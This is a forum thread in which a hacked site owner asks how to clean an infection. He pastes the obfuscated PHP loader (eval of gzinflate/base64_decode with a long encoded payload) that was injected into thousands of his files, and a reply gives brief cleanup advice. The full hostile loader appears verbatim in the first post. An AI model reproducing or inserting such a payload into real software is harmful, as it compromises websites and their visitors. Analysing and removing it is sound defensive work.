If I posted on wrong section, mod please move this topic to related category. Hi, It seems my site is hacked and following text is appearing on my every page of my site. note: I have changed http and .com with xxx. My site has lot of pages and have wordperss, gallery3, and custom php cms are hosted on same hosting. Site hosting is GoDaddy.com What should I do, I searched my pages there is not text link rankexplorer or poker software. Please suggest me what should i do?
That was the output of the script. Actual code was following which is automatically inserted in top of every page of my site <?php /*442a25aa6c9c8923fdb703d230374a43*/ eval(gzinflate(base64_decode('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')));?> PHP: One more thing /*442a25aa6c9c8923fdb703d230374a43*/ the code is changed in every page. so i have to removed it manually from almost 10000+ files I am on GoDaddy 4G Hosting.
A poker software site hacked you? To remove them quickly you could write a simple php script that would check the 1st line of all files in a dir and remove it, as opposed to manually trying to do it. The thing is if the server your site resides on is hacked, your files could be altered again the next time cron or whatever is controlling the hack is initiated, so you should tell godaddy asap also.